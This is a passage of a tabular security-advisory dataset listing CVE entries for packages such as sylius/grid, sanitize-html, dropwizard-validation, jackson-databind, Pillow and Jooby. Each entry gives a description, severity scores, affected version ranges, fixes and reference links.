'1.3.0'}, {'fixed': '1.3.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.1.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'last_affected': '1.0.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'last_affected': '1.1.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'last_affected': '1.2.16'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'last_affected': '1.3.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'last_affected': '1.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12186'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/grid/CVE-2019-12186.yaml'}, {'type': 'WEB', 'url': 'https://sylius.com/blog/cve-2019-12186/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T20:44:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3j7m-hmh3-9jmp,2021-08-23T15:18:04Z,2020-04-16T03:14:47Z,,['CVE-2016-1000237'],Cross-Site Scripting in sanitize-html,"Affected versions of `sanitize-html` do not sanitize input recursively, which may allow an attacker to execute arbitrary Javascript.
+
+
+## Recommendation
+
+Update to version 1.4.3 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sanitize-html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000237'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/issues/29'}, {'type': 'WEB', 'url': 'https://github.com/punkave/sanitize-html/issues/29'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/135'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T02:54:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8jpx-m2wh-2v34,2021-01-08T20:22:52Z,2020-04-10T18:42:20Z,,['CVE-2020-11002'],Remote Code Execution (RCE) vulnerability in dropwizard-validation,"### Summary
+
+A server-side template injection was identified in the self-validating ([`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidating.html)) feature of **dropwizard-validation** enabling attackers to inject arbitrary Java EL expressions, leading to Remote Code Execution (RCE) vulnerability.
+
+If you're using a self-validating bean (via [`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidating.html)), an upgrade to Dropwizard 1.3.21/2.0.3 or later is strongly recommended.
+
+The changes introduced in Dropwizard 1.3.19 and 2.0.2 (see [GHSA-3mcp-9wr4-cjqf](https://github.com/dropwizard/dropwizard/security/advisories/GHSA-3mcp-9wr4-cjqf)/[CVE-2020-5245](https://github.com/advisories/GHSA-3mcp-9wr4-cjqf)) unfortunately didn't fix the underlying issue completely.
+
+### Impact
+
+This issue may allow Remote Code Execution (RCE), allowing to run arbitrary code on the host system (with the privileges of the Dropwizard service account privileges) by injecting arbitrary [Java Expression Language (EL)](https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-interpolation-with-message-expressions) expressions when using the self-validating feature ([`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidating.html), [`@SelfValidation`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidation.html)) in **dropwizard-validation**.
+
+### Patches
+
+The issue has been fixed in **dropwizard-validation** **1.3.21** and **2.0.3** or later. We strongly recommend upgrading to one of these versions.
+
+The evaluation of EL expressions has been disabled by default now.
+
+In order to use some interpolation in the violation messages added to [`ViolationCollector`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html), it has to be explicitly allowed by setting [`SelfValidating#escapeExpressions()`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidating.html#escapeExpressions--) to `false`.
+
+It is also recommended to use the `addViolation` methods supporting message parameters instead of EL expressions introduced in Dropwizard 1.3.21 and 2.0.3:
+* [`ViolationCollector#addViolation(String, Map`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html#addViolation-java.lang.String-java.util.Map-)
+* [`ViolationCollector#addViolation(String, String, Map`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html#addViolation-java.lang.String-java.lang.String-java.util.Map-)
+* [`ViolationCollector#addViolation(String, String, Integer, Map`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html#addViolation-java.lang.String-java.lang.Integer-java.lang.String-java.util.Map-)
+* [`ViolationCollector#addViolation(String, String, String, Map`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html#addViolation-java.lang.String-java.lang.String-java.lang.String-java.util.Map-)
+
+
+### Workarounds
+
+If you are not able to upgrade to one of the aforementioned versions of **dropwizard-validation** but still want to use the [`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidating.html) feature, make sure to properly sanitize any message you're adding to the [`ViolationCollector`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/ViolationCollector.html) in the method annotated with [`@SelfValidation`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.3/io/dropwizard/validation/selfvalidating/SelfValidation.html).
+
+Example:
+```java
+@SelfValidation
+public void validateFullName(ViolationCollector col) {
+ if (fullName.contains(""_"")) {
+ // Sanitize fullName variable by escaping relevant characters such as ""$""
+ col.addViolation(""Full name contains invalid characters: "" + sanitizeJavaEl(fullName));
+ }
+}
+```
+
+See also:
+https://github.com/dropwizard/dropwizard/blob/v2.0.3/dropwizard-validation/src/main/java/io/dropwizard/validation/InterpolationHelper.java
+
+### References
+
+* https://github.com/dropwizard/dropwizard/security/advisories/GHSA-3mcp-9wr4-cjqf
+* https://github.com/dropwizard/dropwizard/pull/3208
+* https://github.com/dropwizard/dropwizard/pull/3209
+* https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-hibernateconstraintvalidatorcontext
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [dropwizard/dropwizard](https://github.com/dropwizard/dropwizard/issues/new)
+* Start a discussion on the [dropwizard-dev mailing list](https://groups.google.com/forum/#!forum/dropwizard-dev)
+
+### Security contact
+
+If you want to responsibly disclose a security issue in Dropwizard or one of its official modules, please contact us via the published channels in our [security policy](https://github.com/dropwizard/dropwizard/security/policy):
+
+https://github.com/dropwizard/dropwizard/security/policy#reporting-a-vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.dropwizard:dropwizard-validation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.21'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.dropwizard:dropwizard-validation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/security/advisories/GHSA-3mcp-9wr4-cjqf'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/security/advisories/GHSA-8jpx-m2wh-2v34'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11002'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/pull/3208'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/pull/3209'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/commit/d5a512f7abf965275f2a6b913ac4fe778e424242'}, {'type': 'WEB', 'url': 'https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-hibernateconstraintvalidatorcontext'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/security/policy#reporting-a-vulnerability'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-10T18:37:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-95cm-88f5-f2c7,2021-10-21T21:13:58Z,2020-04-23T16:32:59Z,,['CVE-2020-10672'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10672'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2659'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T21:12:55Z', 'nvd_published_at': '2020-03-18T22:15:00Z'}"
+1.4.0,GHSA-pc5p-h8pf-mvwp,2021-08-23T15:27:24Z,2020-04-16T03:14:56Z,,[],Machine-In-The-Middle in https-proxy-agent,"Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials.
+
+
+## Recommendation
+
+Upgrade to version 3.0.0 or 2.2.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N/'}]","[{'package': {'ecosystem': 'npm', 'name': 'https-proxy-agent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/541502'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1184'}]","{'cwe_ids': ['CWE-300'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T03:03:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4gp3-p7ph-x2jr,2021-08-23T15:12:51Z,2020-04-14T23:09:00Z,,['CVE-2019-10778'],OS Command Injection in devcert-sanscache,devcert-sanscache before 0.4.7 allows remote attackers to execute arbitrary code or cause a Command Injection via the exec function. The variable `commonName` controlled by user input is used as part of the `exec` function without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'devcert-sanscache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10778'}, {'type': 'WEB', 'url': 'https://github.com/guybedford/devcert/commit/571f4e6d077f7f21c6aed655ae380d85a7a5d3b8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DEVCERTSANSCACHE-540926'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T15:32:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3gg7-9q2x-79fc,2020-04-15T21:07:13Z,2020-04-15T21:09:40Z,,['CVE-2020-1728'],Improper Restriction of Rendered UI Layers or Frames in Keycloak,"A vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1728'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1728'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/KEYCLOAK-12264'}]","{'cwe_ids': ['CWE-1021'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T21:07:13Z', 'nvd_published_at': '2020-04-06T14:15:00Z'}"
+1.4.0,GHSA-8qxj-f9rh-9fg2,2021-08-31T21:18:12Z,2020-04-01T16:35:26Z,,['CVE-2019-14859'],Improper Verification of Cryptographic Signature in Pure-Python ECDSA,"A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ecdsa'}, 'ecosystem_specific': {'affected_functions': ['ecdsa.der.remove_constructed', 'ecdsa.der.remove_sequence', 'ecdsa.der.remove_octet_string', 'ecdsa.der.remove_object', 'ecdsa.der.remove_integer', 'ecdsa.der.read_length', 'ecdsa.keys.VerifyingKey.verify_digest', 'ecdsa.util.sigdecode_string', 'ecdsa.util.sigdecode_strings']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14859'}, {'type': 'WEB', 'url': 'https://github.com/warner/python-ecdsa/issues/114'}, {'type': 'WEB', 'url': 'https://github.com/warner/python-ecdsa/pull/115'}, {'type': 'WEB', 'url': 'https://github.com/tlsfuzzer/python-ecdsa/commit/3427fa29f319b27898a28601955807abb44c0830'}, {'type': 'WEB', 'url': 'https://github.com/tlsfuzzer/python-ecdsa/commit/9080d1d5ac533da0de00466aaffb49bee808bb4e'}, {'type': 'WEB', 'url': 'https://github.com/tlsfuzzer/python-ecdsa/commit/b0ea52bb3aa9a16c9a4a91fdc0041edbfed10b31'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14859'}, {'type': 'PACKAGE', 'url': 'https://github.com/warner/python-ecdsa'}, {'type': 'WEB', 'url': 'https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3'}, {'type': 'WEB', 'url': 'https://pypi.org/project/ecdsa/0.13.3/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T15:40:54Z', 'nvd_published_at': '2020-01-02T15:15:00Z'}"
+1.4.0,GHSA-w8rc-pgxq-x2cj,2021-01-08T21:09:16Z,2020-04-22T20:59:26Z,,['CVE-2020-11007'],Negative charge in shopping cart in Shopizer,"### Impact
+Using API or Controller based versions negative quantity is not adequately validated hence creating incorrect shopping cart and order total.
+
+### Patches
+Adding a back-end verification to check that quantity parameter isn't negative. If so, it is set to 1. Patched in 2.11.0
+
+### Workarounds
+Without uprading, it's possible to just apply the fixes in the same files it's done for the patch. Or you use javax constraint validation on the quantity parameter.
+
+### References
+[Input Validation](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)
+[Using bean validation constraint](https://javaee.github.io/tutorial/bean-validation002.html)
+[Commits with fixes](https://github.com/shopizer-ecommerce/shopizer/commit/929ca0839a80c6f4dad087e0259089908787ad2a)
+CVE Details below :
+[Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11007)
+[NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-11007)
+
+### Credits
+Found and solved by Yannick Gosset from Aix-Marseille University cybersecurity
+master program supervised by Yassine Ilmi ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.shopizer:sm-core-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/security/advisories/GHSA-w8rc-pgxq-x2cj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11007'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/commit/929ca0839a80c6f4dad087e0259089908787ad2a'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T18:16:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6gp3-h3jj-prx4,2022-04-28T17:58:13Z,2020-04-07T15:47:40Z,,['CVE-2020-7637'],Prototype pollution in class-transformer,class-transformer through 0.2.3 is vulnerable to Prototype Pollution. The 'classToPlainFromExist' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'class-transformer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7637'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-transformer/commit/8f04eb9db02de708f1a20f6f2d2bb309b2fed01e'}, {'type': 'PACKAGE', 'url': 'https://github.com/typestack/class-transformer'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-transformer/blob/a650d9f490573443f62508bc063b857bcd5e2525/src/ClassTransformer.ts#L29-L31,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CLASSTRANSFORMER-564431'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-07T15:46:31Z', 'nvd_published_at': '2020-04-06T13:15:00Z'}"
+1.4.0,GHSA-hj69-c76v-86wr,2023-09-05T09:26:37Z,2020-04-01T16:36:00Z,,['CVE-2020-5313'],Out-of-bounds Read in Pillow,`libImaging/FliDecode.c` in Pillow before 6.2.2 has an FLI buffer overflow.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5313'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/a09acd0decd8a87ccce939d5ff65dab59e7d365b'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/blob/master/CHANGES.rst#622-2020-01-02'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MMU3WT2X64GS5WHDPKKC2WZA7UIIQ3A/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4631'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T16:15:16Z', 'nvd_published_at': '2020-01-03T01:15:00Z'}"
+1.4.0,GHSA-gv3v-92v6-m48j,2021-07-29T15:47:43Z,2020-04-03T15:23:30Z,,['CVE-2020-7622'],Improper Neutralization of CRLF Sequences in HTTP Headers in Jooby ('HTTP Response Splitting),"### Impact
+
+ - Cross Site Scripting
+ - Cache Poisoning
+ - Page Hijacking
+
+### Patches
+
+This was fixed in version `2.2.1`.
+
+### Workarounds
+
+If you are unable to update, ensure that user supplied data isn't able to flow to HTTP headers. If it does, pre-sanitize for CRLF characters.
+
+### References
+
+##### [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')](https://cwe.mitre.org/data/definitions/113.html)
+
+I've been poking at libraries to see if they are vulnerable to HTTP Response Splitting and Jooby is my third case of finding this vulnerability.
+
+### Root Cause
+
+This roots cause back to this line in the Jooby codebase:
+
+https://github.com/jooby-project/jooby/blob/93cfc80aa20c188f71a442ea7a1827da380e1c27/modules/jooby-netty/src/main/java/io/jooby/internal/netty/NettyContext.java#L102
+
+The `DefaultHttpHeaders` takes a parameter `validate` which, when `true` (as it is for the no-arg constructor) validates that the header isn't being abused to do HTTP Response Splitting.
+
+### Reported By
+
+This vulnerability was reported by @JLLeitschuh ([Twitter](https://twitter.com/JLLeitschuh))
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [jooby-project/jooby](https://github.com/jooby-project/jooby/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jooby:jooby-netty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jooby-project/jooby/security/advisories/GHSA-gv3v-92v6-m48j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7622'}, {'type': 'WEB', 'url': 'https://github.com/jooby-project/jooby/commit/b66e3342cf95205324023cfdf2cb5811e8a6dcf4'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-IOJOOBY-564249'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-02T23:59:56Z', 'nvd_published_at': '2020-04-06T15:15:00Z'}"
+1.4.0,GHSA-265q-28rp-chq5,2021-08-23T15:25:55Z,2020-04-16T03:14:50Z,,['CVE-2015-8851'],Insecure Entropy Source - Math.random() in node-uuid,"Affected versions of `node-uuid` consistently fall back to using `Math.random` as an entropy source instead of `crypto`, which may result in guessable UUID's.
+
+
+
+## Recommendation
+
+Update to version 1.4.4 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-uuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-8851'}, {'type': 'WEB', 'url': 'https://github.com/broofa/node-uuid/issues/108'}, {'type': 'WEB', 'url': 'https://github.com/broofa/node-uuid/issues/122'}, {'type': 'WEB', 'url': 'https://github.com/broofa/node-uuid/commit/672f3834ed02c798aa021c618d0a5666c8da000d'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1327056'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/93'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2016/04/13/8'}]","{'cwe_ids': ['CWE-331'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T02:58:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jgpq-g82g-6c39,2021-07-28T23:16:44Z,2020-04-07T15:52:05Z,,['CVE-2020-7638'],confinit vulnerable to prototype pollution,confinit through 0.3.0 is vulnerable to Prototype Pollution.The 'setDeepProperty' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'confinit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7638'}, {'type': 'WEB', 'url': 'https://github.com/davideicardi/confinit/commit/a34e06ca5c1c8b047ef112ef188b2fe30d2a1eab'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONFINIT-564433'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-07T15:51:51Z', 'nvd_published_at': 